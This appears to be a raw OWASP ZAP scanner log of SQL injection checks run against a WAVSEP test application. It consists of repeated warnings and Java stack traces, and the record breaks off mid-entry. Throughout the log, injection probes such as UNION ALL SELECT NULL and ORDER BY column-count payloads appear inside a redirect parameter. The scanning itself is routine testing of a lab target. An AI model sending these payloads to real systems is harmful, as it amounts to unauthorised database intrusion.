http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681522 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681523 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681523 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681524 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681525 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681526 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681526 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681527 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681528 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 5343#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 5343# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681529 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 2104#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// ORDER BY 2104# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681529 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681530 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at 